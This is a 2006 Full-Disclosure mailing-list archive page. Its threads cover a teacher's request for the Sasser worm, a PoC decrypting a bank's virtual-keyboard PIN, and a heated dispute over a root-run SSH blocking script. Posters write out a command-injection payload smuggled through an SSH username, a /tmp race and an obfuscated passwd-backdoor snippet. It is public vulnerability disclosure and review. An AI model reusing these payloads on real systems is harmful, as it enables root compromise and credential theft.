Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The state of JavaScript Hacking
So what you are trying to say is that JavaScript is bad, because it nowadays runs on more than one platform? Or did I miss something? Since when has the choice of programming language made any difference? Best, Martin -- Martin Johns http://www.martinjohns.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SSH brute force blocking tool
For those interested, I wrote a program called Sharpener which is an SSH brute force blocking tool that also reports back the offenders' addresses. I have begun posting the information on the attackers as well as sending out messages (whenever possible) to the admins of these domains. Think of it as an RBL for SSH attackers. The goal is to identify these machines in order for others to implement safeguards (ACL's) against these hosts. Feel free to comment/complain. http://www.infiltrated.net/sharpener (tool) http://www.infiltrated.net/bruteforcers (offenders) -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
a douchebag? I dunno but why the hell aren't your boxes patched to Sasser yet? -KF deep fried wrote: What am I Consultant? School Teacher? Terrorist? On 11/27/06, *K F (lists)* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? Its not like he is intentionally letting it loose on the entire school LAN. -KF [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Chris - I don't know what to make of your please reply off-list; I'm not a member comment. It's almost as ridiculous as what you are requesting. If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district. Speak as a network engineer for a large midwestern schooldistrict, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out; that I'll be making a point of asking who the computer teachers are in that building. You want to teach these kids a lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network. = I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Defeating Image-Based Virtual KeyboardsandPhishing Banks (fwd)
Over 8 years old (mid 1997/8) - http://www.dotsec.com/onBank.html?topic=302544 Lyal -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Debasis Mohanty Sent: Tuesday, 28 November 2006 6:12 PM To: 'Gadi Evron'; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Defeating Image-Based Virtual KeyboardsandPhishing Banks (fwd) More than a year Old (3rd August, 2005) - Defeating CITI-BANK Virtual Keyboard Protection http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0142.html http://hackingspirits.com/vuln-rnd/Defeat-CitiBank-VK.zip http://xforce.iss.net/xforce/xfdb/21727 Regards, -d -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gadi Evron Sent: Sunday, November 26, 2006 12:18 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Defeating Image-Based Virtual Keyboards andPhishing Banks (fwd) Copied from a post by Noam Rathaus on the SecuriTeam Blogs, following up a post by HispaSec. This is about breaking virtual keyboards implementations, and the encryption some of them use (most of them send the data in clear text with the image). HispaSec was a reference by which we found the banks' site as one using a virtual keyboard. http://blogs.securiteam.com/index.php/archives/678 http://hispasec.com/laboratorio/cajamurcia_en.htm Gadi. Quoting: Recently, I stumbled upon a post by HispaSec showing off a screen shot trojan (http://hispasec.com/laboratorio/cajamurcia_en.htm) which nicely showed how a trojan horse can, utilizing a key stroke capture and screenshot capture, grab a user's PIN number, fairly easily, and wondered why are they taking this approach when the PIN numbers can be easily retrieved by sniffing the data sent by the user to the banking site, even though they are encrypted. Image based keyboard (or virtual keyboards) were invented to make life harder for banking or phishing trojan horses (specifically key-stroke loggers or key loggers), some even suggested they be used specifically to avoid these trojan horses. The bad guys adapted to this technology and escalated. Now the trojan horses take screenshots of where the mouse pointer is to determine what number they clicked on. Thing is, it is often unnecessary as in most implementations of this technique that we looked into (meaning, not all) it was flawed. Instead of sending the remote image and waiting for the key-stroke information to be sent back to the server (the technique which the screenshots for pointer location on-click described above was used) some banks send the PIN number in cleartext, while others encrypt them, one such example is cajamurcia. Even when the encryption is used, banks tend to implement it badly making it easy to recover the PIN number from the encrypted form. I investigated a bit more on how cajamurcia handles such PIN strokes (with virtual keyboards) and I noticed something strange, they take the timestamp of their server (cajamurcia) and send it to you - this already posses a security problem - and this timestamp is then used to encrypt the PIN number you entered. This would have been a good idea if the timestamp was not sent back to the server, making it hard or semi-hard to guess the timestamp used to encrypt the data, but at the same time making it harder for the server to know what timestamp was provided to the client (unless they store it inside their session information). Anyhow, as it is sent back to the server, we have everything we need to decrypt the data (PIN number). PoC: A request to the server would look like: OPERACION=0002 CAJA=2043 CAMINO=2043 PGDESTI=CORP BROKER=SI VRS=001 PAN=2043123456 SELLO=16100616012569 CL=1161006956 PINV3=si PANA=2043 PANB=123456 PIN=BBCB6E341C56C6B2 IDIOMA=01 We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL being the timestamp and PIN being the encrypted form of the PIN number. If we feed these into the following JS code: https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js function hexToString (h) { var r = ; for (var i= (h.substr(0, 2)==0x)?2:0; i lowerthan h.length; i+=2) { r += String.fromCharCode (parseInt (h.substr (i, 2), 16)); } return r; } calcula = '1161006956'; ciphertext = hexToString('0xBBCB6E341C56C6B2'); var cleartext = des (calcula.substr(2,8), ciphertext, 0, 1, ); console.debug(cleartext); We will get our original PIN number. This isn't necessarily easier as it requires data capture, which isn't always easy, but screen captures usually require either an OCR, or manual labor, which the above code does not. One needs to remember that Javascript (or any client-side code and information) is indeed on the client's side and under the client's control. An attacker can kick it aside, or learn to emulate it and attack it - manipulate it. Client-side encryption where the code and key are visible is pointless. No matter how much obfuscation or cross-frame and cross-file scripting is
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 02:22:10PM -0500, J. Oquendo wrote: For those interested, I wrote a program called Sharpener which is an SSH brute force blocking tool that also reports back the offenders' addresses. I have begun posting the information on the attackers as well as sending out messages (whenever possible) to the admins of these domains. Think of it as an RBL for SSH attackers. The goal is to identify these machines in order for others to implement safeguards (ACL's) against these hosts. Feel free to comment/complain. http://www.infiltrated.net/sharpener (tool) http://www.infiltrated.net/bruteforcers (offenders) Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victim -- - [EMAIL PROTECTED] | finger me for my pgp key. --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006 13:36:39 EST, K F (lists) said: Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? Its not like he is intentionally letting it loose on the entire school LAN. You would have us believe that the guy is clued enough to run a closed lab without screwing up (and there's *lots* of ways to screw up, starting with forgetting to wipe the drives afterwards, forgetting to disable a wireless card, forgetting to not plug any of the boxes into the normal net, forgetting to...). And yet he's not clued enough to know how to find a copy of Sasser by himself. There are a lot of people who are of the opinion that if you have to ask where to find a copy of Sasser, you're not clued enough to be trusted with a copy. pgpw76PA4Q4Wi.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote: Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victim Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory) if [ `whoami` != root ] then echo This script needs to run under the root user exit else if [ -e /tmp/hosts.deny ] then rm /tmp/hosts.deny fi / Check to see if the user is root. If not, tell the user Hey dumbass, you need to be root, if the user is root, continue. / awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru /tmp/hosts.deny diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ //{print $2}' /etc/hosts.deny / There is no hocus pocus here. Look at /var/log/secure and fine the term error retrieving and print the next line, 13th column. Then sort it and print the unique entries into /tmp/hosts.deny. After you do this, compare /tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny into /etc/hosts.deny / OS=$( uname|sed -n '1p') / This is a no brainer. No voodoo there. # IPTables function... ifaddr=`ifconfig -a|awk '/inet/ !/inet6/ !/127.0/ !/192.168/{print $2}'|sed 's/addr\://g'` Do an ifconfig on the machine. Ignore the word inet, inet6, 127.0, 192.168, print the second field, and replace the term addr: with nothing. No voodoo here jackass. / function IPT { awk '!/#/ /\./ !a[$0]++ {print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT}' /etc/hosts.deny |\ awk '/iptables/ !/#/ !/-s -i/'|sh } / This is such a hacker thing coming now. You caught me. Ignore comments !/#/ print anything with a decimal /\./ make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk hacking) / if [ $OS = Linux ] then IPT fi / This is where I guess I hack the world. Check the OS and if it's Linux, then cat /etc/hosts.deny Ignore comments !/#/ print anything with a decimal /\./ make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk hacking) then print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT $1 = IP address $ifaddr = IP address of the interface / echo Copying sharpener to /usr/local/bin sed -n '1,67p' ./sharpener /usr/local/bin/sharpener echo fi /usr/local/bin/sharpener rm ./sharpener / Here goes the voodoo... You ready? print lines from 1 through 67 of this same file but put it in /usr/local/sharpener add a fi to that same file then remove the original / sleep 2 echo echo Adding Sharpener to cron echo 0,10,20,30,40,50 * * * * /usr/local/bin/sharpener if [ -e /var/spool/cron/root ] then echo 0,10,20,30,40,50 * * * * /usr/local/bin/sharpener /var/spool/cron/root else if [ -e /var/cron/tabs/root ] then echo 0,10,20,30,40,50 * * * * /usr/local/bin/sharpener /var/cron/tabs/root fi fi / Add it to cron / awk '!/192.168/ !/127./ !/#/ !/172.32/{print $1 has been blocked via SSH}' /etc/hosts.deny |\ mail -s Sharpener [EMAIL PROTECTED] fi / Print out the first column of /etc/hosts.deny ... Ignore 127., ignore #, and ignore 172.32 then mail it to an evil hacker site so they can traverse telekinetically into your machine. Right. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote: Tavis Ormandy wrote: Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victim Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory) / awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru /tmp/hosts.deny insecure temporary file creation, race condition if a user can create that file between the unlink and the open. $ ssh error retrieving@localhost ssh '`0wn3d`'@localhost $ awk '/error retrieving/{getline;print $13}' /var/log/authlog `0wn3d` Oops. Thanks, Tavis. -- - [EMAIL PROTECTED] | finger me for my pgp key. --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
On 11/27/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: And yet he's not clued enough to know how to find a copy of Sasser by himself. There are a lot of people who are of the opinion that if you have to ask where to find a copy of Sasser, you're not clued enough to be trusted with a copy. yeah I agree, whoever posted/ started this orginal thread was on gmail and is not clued in enough to take a quick left glance at the adsense frame and s/eh will get tonnes of bait from google :)- go figure.. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote: Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory) Uh... actually, no. The provided exploit Will work, and you're the idiot. Here, let me show you. You do this: / awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru /tmp/hosts.deny diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ //{print $2}' /etc/hosts.deny / There is no hocus pocus here. Look at /var/log/secure and fine the term error retrieving and print the next line, 13th column. Then sort it and print the unique entries into /tmp/hosts.deny. After you do this, compare /tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny into /etc/hosts.deny What will be in column 13 when Tavis does this: Tavis Ormandy wrote: Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victim Why, the shelled-out output of `/sbin/halt`! Or, hey, anything he or I care to put inside backticks. You'll execute it blindly, as root, on your system. Kids, don't use this script. Please. -- gabriel rosenkoetter [EMAIL PROTECTED] pgpfX9tuMYBhq.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote: On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote: Tavis Ormandy wrote: Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victim Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory) / awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru /tmp/hosts.deny insecure temporary file creation, race condition if a user can create that file between the unlink and the open. $ ssh error retrieving@localhost ssh '`0wn3d`'@localhost $ awk '/error retrieving/{getline;print $13}' /var/log/authlog `0wn3d` Oops. Thanks, Tavis. So again dumbass... Look at the script. Although YOU'RE opening /var/log/authlog what is the script opening. Please tell me you're really not that stupid. And if someone else decided to modify this script, what does that have to do with what I posted. How exactly is my script a backdoor as you claim. Enquiring minds want to know this since you claim its a backdoor. Please tell me outside of your modification how this is going to backdoor someone. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote: On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote: Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory) Uh... actually, no. The provided exploit Will work, and you're the idiot. Here, let me show you. You do this: / awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru /tmp/hosts.deny diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ //{print $2}' /etc/hosts.deny / There is no hocus pocus here. Look at /var/log/secure and fine the term error retrieving and print the next line, 13th column. Then sort it and print the unique entries into /tmp/hosts.deny. After you do this, compare /tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny into /etc/hosts.deny What will be in column 13 when Tavis does this: Tavis Ormandy wrote: Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victim Why, the shelled-out output of `/sbin/halt`! Or, hey, anything he or I care to put inside backticks. You'll execute it blindly, as root, on your system. Kids, don't use this script. Please. Jesus christ people get stupider by the moment. W/e the script is there for scrutiny there is no hidden voodoo. If you DO want to see hidden voodoo here it is,,, -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote: On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote: Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory) Uh... actually, no. The provided exploit Will work, and you're the idiot. Here, let me show you. You do this: / awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru /tmp/hosts.deny diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ //{print $2}' /etc/hosts.deny / There is no hocus pocus here. Look at /var/log/secure and fine the term error retrieving and print the next line, 13th column. Then sort it and print the unique entries into /tmp/hosts.deny. After you do this, compare /tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny into /etc/hosts.deny What will be in column 13 when Tavis does this: Tavis Ormandy wrote: Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victim Why, the shelled-out output of `/sbin/halt`! Or, hey, anything he or I care to put inside backticks. You'll execute it blindly, as root, on your system. Kids, don't use this script. Please. Here is your voodoo backdoor moron file=`awk 'NR==59 {gsub(//,);print $3}' /usr/include/paths.h` sed -n '1p' $file|awk -F : 'BEGIN{OFS=:}{$1=test}1{$2=\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1}2' $file file2=`awk 'NR==74 {gsub(/,/,);print $8}' /usr/include/sysexits.h` sed -n '1p' $file2|sed 's/[^:]*:/test:/' $file2 who=`sed -n '58p' sysexits.h |awk '{print $5}'` what=`sed -n '60p' wireless.h |awk 'gsub(/,/, ){print $4}'` when=` sed -n '60p' wireless.h |awk 'gsub(/,/, //){print $4}'` $what|$who full-disclosure@lists.grok.org.uk -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On 11/27/06, J. Oquendo [EMAIL PROTECTED] wrote: There is no hocus pocus here. Look at /var/log/secure and fine the term error retrieving and print the next line, 13th column. Then sort it and print the unique entries into /tmp/hosts.deny. After you do this, compare /tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny into /etc/hosts.deny Parsing malicious input with shell commands is like disarming land mines with a hammer. And doing it as root? That's like disarming land mines with a hammer while you're stark naked. Regards, Brian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 03:59:37PM -0500, gabriel rosenkoetter wrote: Uh... actually, no. The provided exploit Will work, and you're the idiot. Begging your pardon, you are saved by single-quoting your awk(1) statement: awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru /tmp/hosts.deny [...] What will be in column 13 when Tavis does this: Tavis Ormandy wrote: ssh 'foo bar `/sbin/halt`'@victim [...] Why, the shelled-out output of `/sbin/halt`! Nope, I'm wrong, just the literal string `/sbin/halt`, which you never exec. Mea culpa. Tavis's exploit doesn't so scary things, although he's right you should really be doing a bit more sanitization of (evil) user-supplied input, given that you're (insisting that you) run as root. On Mon, Nov 27, 2006 at 04:12:11PM -0500, J. Oquendo wrote: Look at the script. Although YOU'RE opening /var/log/authlog what is the script opening. Please tell me you're really not that stupid. Actually, your BSD version DOES open /var/log/authlog (which will fail on FreeBSD, btw, where it's /var/log/auth.log), so you should probably stop casting stones and quit while you're ahead with my explanation above of why Tavis's exploit is a non-starter. But since we're on the topic... wouldn't it be a better plan to check the local syslog.conf for the location of the auth failure log messages rather than hard code it? -- gabriel rosenkoetter [EMAIL PROTECTED] pgp9aDaZQPXuz.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:12:11PM -0500, J. Oquendo wrote: So again dumbass... Look at the script. Although YOU'RE opening /var/log/authlog what is the script opening. I'm opening authlog as I dont use secure, the same thing applies. Please tell me you're really not that stupid. And if someone else decided to modify this script, what does that have to do with what I posted. How exactly is my script a backdoor as you claim. It's a backdoor because your script doesnt account for out-of-order log entries, usernames or other data containing spaces thus making your field count incorrect, or other daemons using the string `error retrieving` in their log entries. The insecure temporary file creation allows a local user to add entries to the passwd file (for example), or create or modify any file as root. Although it doesnt directly allow them to control the data the fileis created with, combined with the other flaw this is possible. Even without the other flaw, the existence of some files is a problem, such as /etc/.nologin. the test -e and rm is insufficient, firstly as it's a race condition, and secondly as test -e will return 1 on broken (sometimes called dangling) symlinks. Enquiring minds want to know this since you claim its a backdoor. Please tell me outside of your modification how this is going to backdoor someone. I'm not sure what you mean by modification, I simply subsituted the name for the logfile I use. Thanks, Tavis. -- - [EMAIL PROTECTED] | finger me for my pgp key. --- pgpvmB2Xh1ofl.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote: I'm not sure what you mean by modification, I simply subsituted the name for the logfile I use. Thanks, Tavis. So for the third time now. Explain to me how I am backdooring someone's system. [EMAIL PROTECTED] include]# uname -a Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686 i686 i386 GNU/Linux [EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru 222.171.20.252 211.137.74.58 My logs parse out addresses not named and there is no redirection going on. If you want to say Hey... It should be written as such then gladly do so. But posting hey you're backdooring the planet like a jackass is moronic. Line by line on my machines it does what it needs to do and it does so just fine. Did you see any notes of Gentoo on the comments? I didn't because I don't use it, never have, don't care to. So if it does something different on Gentoo, let's use the brain for a moment... Gee this works horrible on Gentoo. The author is a shitty writer... I think I should let him know as opposed to Oh my gawd he's backdooring you. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote: Mea culpa. Tavis's exploit doesn't so scary things, although he's right you should really be doing a bit more sanitization of (evil) user-supplied input, given that you're (insisting that you) run as root. Gabriel, I was referring to this line: awk '!/#/ /\./ !a[$0]++ {print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT}' /etc/hosts.deny |\ awk '/iptables/ !/#/ !/-s -i/'|sh (note the |sh), $1 can be controlled by specially crafted attempted logins. Thanks, Tavis. -- - [EMAIL PROTECTED] | finger me for my pgp key. --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 09:29:33PM +, Tavis Ormandy wrote: Gabriel, I was referring to this line: awk '!/#/ /\./ !a[$0]++ {print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT}' /etc/hosts.deny |\ awk '/iptables/ !/#/ !/-s -i/'|sh (note the |sh), $1 can be controlled by specially crafted attempted logins. Aha. Yep, sure can! I couldn't find where the malicious input was actually executed, but I didn't spend long looking. I take back my take back. -- gabriel rosenkoetter [EMAIL PROTECTED] pgpZhqVSn11PF.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
why not save all that trouble and just use the --limit directive in iptables? (examples on the netfilter mailing-list). ~Mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:27:24PM -0500, J. Oquendo wrote: Tavis Ormandy wrote: I'm not sure what you mean by modification, I simply subsituted the name for the logfile I use. Thanks, Tavis. So for the third time now. Explain to me how I am backdooring someone's system. J, Please calm down. You have made a programming error in your script that attempts to eliminate the minor `log noise` from incorrect ssh logins with a script that can be subverted to execute arbitrary shell commands. [EMAIL PROTECTED] include]# uname -a Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686 i686 i386 GNU/Linux [EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru 222.171.20.252 211.137.74.58 My logs parse out addresses not named and there is no redirection going on. Yes, but you assume a fixed format of the log entries. This is not the case. The string error retrieving is easily placed in the log by setting it as your username and attempting to login. You also assume that the multiple log entries generated by a failed login are logged atomically (ie, no other log entries will appear between these two entries), this is also not the case. If you want to say Hey... It should be written as such then gladly do so. But posting hey you're backdooring the planet like a jackass is moronic. J, you asked people to install your security tool which contacts you with enough information to find out who installed it and where, and contains several rather obvious security flaws. If I mistook stupidity for malice, I apologise. Line by line on my machines it does what it needs to do and it does so just fine. This is because your logs dont contain any entries specially crafted by an attacker to subvert your machine. I'm sure some members of the list are already attempting this on your web server, so you can check your logs for examples. Did you see any notes of Gentoo on the comments? I didn't because I don't use it, never have, don't care to. So if it does something different on Gentoo, let's use the brain for a moment... Gee this works horrible on Gentoo. The author is a shitty writer... I think I should let him know as opposed to Oh my gawd he's backdooring you. It's a standard format J, my log entries look identical to yours. It has nothing to do with Gentoo. Thanks, Tavis. -- - [EMAIL PROTECTED] | finger me for my pgp key. --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:27:24PM -0500, J. Oquendo wrote: So for the third time now. Explain to me how I am backdooring someone's system. [EMAIL PROTECTED] include]# uname -a Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686 i686 i386 GNU/Linux [EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru 222.171.20.252 211.137.74.58 My logs parse out addresses not named and there is no redirection going on. If you want to say Hey... It should be written as such then gladly do so. You are dealing with output you can't trust there. $13 could be anything, including \n`rm -rf /`. Later on, you pass $13, unstripped of newlines, backticks, or any number of other special character to a shell running as uid 0. That shell will proceed to execute whatever we would like it to, where we are the remote attacker who doesn't even have an account. I don't believe the suggestion was ever that you had malicious intent, but rather that you have very horrible coding security habits. I'm disinclined to sort out which of your machines I can get root on right now because you are running this script, but I would expect that someone reading this mailing list is already on the way and would strongly advise that you disable those cron jobs. -- gabriel rosenkoetter [EMAIL PROTECTED] pgpnRZzA4hpPU.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
